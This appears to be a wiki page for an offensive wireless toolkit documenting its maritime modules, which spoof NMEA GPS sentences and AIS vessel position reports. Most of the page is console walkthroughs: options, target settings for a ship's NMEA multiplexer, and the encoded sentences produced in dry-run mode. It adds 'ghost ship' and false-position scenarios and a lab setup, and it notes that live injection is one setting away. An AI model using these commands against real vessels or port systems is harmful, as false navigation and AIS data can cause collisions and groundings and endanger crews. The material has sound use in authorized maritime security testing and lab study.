Skip to content

Maritime Security

Jump to bottom
André Henrique edited this page Jun 8, 2026 · 1 revision

Maritime Security

Legal Warning: AIS and NMEA spoofing at sea is illegal under SOLAS and maritime law in all jurisdictions. It creates navigation safety hazards and is a criminal offense under IMO regulations. Use only in authorized lab environments, closed RF chambers, or in authorized maritime security assessments with explicit written permission from vessel owners and port authorities.

Module Reference

Module Description
nmea_spoof NMEA 0183 GPS/navigation sentence injection (TCP multiplexer)
ais_spoof AIS vessel position report spoofing with Type 1 bit encoding

NMEA 0183 Overview

NMEA 0183 is the standard serial protocol for marine navigation instruments. It carries GPS position, heading, speed, depth, wind, and other sensor data between chart plotters, autopilots, VHF radios, and AIS transponders.

Most NMEA multiplexers (SeaTalk, NMEA 2000 gateways, SignalK servers) accept TCP connections on port 10110 without authentication. An attacker with network access to the ship's LAN or WiFi can inject arbitrary NMEA sentences.

NMEA Sentence Structure

$GPGGA,hhmmss.ss,LLLL.LL,a,YYYYY.YY,a,x,xx,x.x,x.x,M,x.x,M,x.x,xxxx*hh<CR><LF>
  • $GP = GPS source prefix
  • GGA = Global Positioning System Fix Data
  • Fields: time, latitude, N/S, longitude, E/W, fix quality, satellites, HDOP, altitude...
  • *hh = NMEA checksum (XOR of all bytes between $ and *)

NMEA Spoof

wxf > use generic/maritime/nmea_spoof
wxf (NMEASpoof) > show options

Options:
  TARGET_HOST  127.0.0.1    TCP host for NMEA multiplexer
  TARGET_PORT  10110        TCP port for NMEA multiplexer
  LAT          0.000000     Spoofed latitude (decimal degrees, N positive)
  LON          0.000000     Spoofed longitude (decimal degrees, E positive)
  SPEED_KN     0.0          Spoofed speed over ground in knots
  HEADING      0.0          Spoofed true heading in degrees
  DEPTH_M      10.0         Spoofed water depth in meters
  RATE_HZ      1            Sentences per second
  SIMULATE     true         Dry-run, show sentences without sending

wxf (NMEASpoof) > set TARGET_HOST 192.168.1.100
wxf (NMEASpoof) > set TARGET_PORT 10110
wxf (NMEASpoof) > set LAT 1.264
wxf (NMEASpoof) > set LON 103.826
wxf (NMEASpoof) > set SPEED_KN 0.0
wxf (NMEASpoof) > set SIMULATE true
wxf (NMEASpoof) > run

[SIMULATE] NMEA sentences to inject at 1 Hz:

[SIMULATE] $GPGGA,083000.00,0115.840,N,10349.560,E,1,08,1.0,10.0,M,0.0,M,,*49
           GGA: pos=(1.264N, 103.826E) alt=10m fix=GPS sats=8

[SIMULATE] $GPGLL,0115.840,N,10349.560,E,083000.00,A,A*6E
           GLL: lat/lon confirmed active

[SIMULATE] $GPVTG,0.0,T,0.0,M,0.0,N,0.0,K,A*23
           VTG: speed=0.0kn heading=0.0

[SIMULATE] $GPRMC,083000.00,A,0115.840,N,10349.560,E,0.0,0.0,080626,0.0,E,A*37
           RMC: recommended minimum data

[SIMULATE] $SDDPT,10.0,0.0*53
           DPT: depth=10.0m offset=0.0m

[!] Set SIMULATE=false to inject live into TCP:192.168.1.100:10110
[!] PREREQ: Network access to ship NMEA multiplexer (WiFi, Ethernet, or serial gateway)

AIS Spoofing

AIS (Automatic Identification System) is a VHF radio broadcast system used by vessels to announce position, identity, speed, and heading to other ships and shore stations. It operates on VHF channels 87B (161.975 MHz) and 88B (162.025 MHz).

AIS Message Types

Type Description Notes
1 Class A Position Report Large vessels, required by SOLAS
2 Class A Position Report (assigned) Similar to Type 1
3 Class A Position Report (response) Similar to Type 1
4 Base Station Report Shore-based AIS
5 Static and Voyage Data Ship name, destination, ETA
14 Safety Related Broadcast Free-text safety message
18 Class B Position Report Smaller vessels
21 Aid-to-Navigation Report Lighthouses, buoys

AIS Spoof

wxf > use generic/maritime/ais_spoof
wxf (AISSpoofAttack) > show options

Options:
  TARGET_HOST  127.0.0.1  AIS multiplexer TCP host
  TARGET_PORT  10110      AIS multiplexer TCP port
  MMSI         123456789  Maritime Mobile Service Identity (9 digits)
  VESSEL_NAME  PHANTOM    Vessel name (max 20 chars, uppercase)
  LAT          0.000000   Position latitude (decimal degrees)
  LON          0.000000   Position longitude (decimal degrees)
  SPEED_KN     0.0        Speed over ground in knots (0.1 resolution)
  COURSE       0.0        Course over ground in degrees
  HEADING      511        True heading (511 = not available)
  NAV_STATUS   0          Navigation status (0=underway, 1=at anchor, 5=moored)
  MSG_TYPE     1          AIS message type (1/2/3 = Class A position)
  RATE_HZ      0.33       Transmission rate (AIS default: 1/3 Hz)
  SIMULATE     true       Dry-run, show encoded sentence without sending

wxf (AISSpoofAttack) > set TARGET_HOST 192.168.1.100
wxf (AISSpoofAttack) > set TARGET_PORT 10110
wxf (AISSpoofAttack) > set MMSI 123456789
wxf (AISSpoofAttack) > set VESSEL_NAME PHANTOM
wxf (AISSpoofAttack) > set LAT 1.264
wxf (AISSpoofAttack) > set LON 103.826
wxf (AISSpoofAttack) > set SPEED_KN 12.0
wxf (AISSpoofAttack) > set COURSE 90.0
wxf (AISSpoofAttack) > set SIMULATE true
wxf (AISSpoofAttack) > run

[SIMULATE] AIS Type 1 (Class A Position Report)
[SIMULATE]   MMSI:     123456789
[SIMULATE]   Vessel:   PHANTOM
[SIMULATE]   Position: 1.264000N / 103.826000E
[SIMULATE]   Speed:    12.0 kn | Course: 90.0 deg | Heading: N/A
[SIMULATE]   Nav:      0 (underway using engine)

[SIMULATE] AIS bit encoding (168 bits):
[SIMULATE]   msg_type=1 repeat=0 mmsi=123456789 status=0
[SIMULATE]   rot=128 sog=120 accuracy=0 lon=10382600 lat=126400
[SIMULATE]   cog=900 hdg=511 timestamp=60 maneuver=0 spare=0 raim=0 radio=0

[SIMULATE] NMEA sentence:
[SIMULATE]   !AIVDM,1,1,,A,15NNhV0P00G?Uf6E4lFh23oP0000,0*5B
[SIMULATE]   VDM: VHF Data-link Message (received from vessel)

[!] Set SIMULATE=false to inject into TCP:192.168.1.100:10110
[!] AIS spoofing is a maritime criminal offense under IMO and SOLAS
[!] PREREQ: Network access to ship AIS multiplexer (OpenCPN, deckman, etc.)
[!] NOTE: RF transmission requires SDR + VHF antenna - not implemented here

Attack Scenarios

Scenario 1: Ghost Ship Creation

Creates a phantom vessel on AIS that appears to other ships and shore radar. Can be used to test vessel traffic service (VTS) responses and AIS receiver validation.

wxf > use generic/maritime/ais_spoof
wxf (AISSpoofAttack) > set VESSEL_NAME GHOST_SHIP_TEST
wxf (AISSpoofAttack) > set MMSI 999000001
wxf (AISSpoofAttack) > set LAT -23.9617
wxf (AISSpoofAttack) > set LON -46.3333
wxf (AISSpoofAttack) > set SPEED_KN 5.0
wxf (AISSpoofAttack) > set COURSE 180.0
wxf (AISSpoofAttack) > set NAV_STATUS 0
wxf (AISSpoofAttack) > set SIMULATE true
wxf (AISSpoofAttack) > run

Scenario 2: GPS Position Mismatch Test

Inject a position via NMEA that differs from the vessel's actual GPS position to test chart plotter failover and cross-validation between sensors.

wxf > use generic/maritime/nmea_spoof
wxf (NMEASpoof) > set LAT -23.9617
wxf (NMEASpoof) > set LON -46.3333
wxf (NMEASpoof) > set SIMULATE true
wxf (NMEASpoof) > run

Lab Setup

SignalK Server (software multiplexer)

# Install SignalK
npm install -g @signalk/server

# Start with NMEA TCP input on port 10110
signalk-server --listen 10110 --port 3000

# WXF can now inject into localhost:10110

OpenCPN Chart Plotter

OpenCPN is a free chart plotter. Configure a network data connection (TCP client, port 10110) to receive injected NMEA/AIS sentences in real time.

Related pages: Drone Security | Sub-GHz Attacks | Evidence & Forensics

Author: Andre Henrique (@mrhenrike) | Uniao Geek

WirelessXPL-Forge v1.8.0

Home-pt-BR | Home

Português (pt-BR)

Primeiros Passos

Ataques Wireless

Drones e UAV

Protocolos Especializados

Ferramentas de Pentest

Hardware

Clone this wiki locally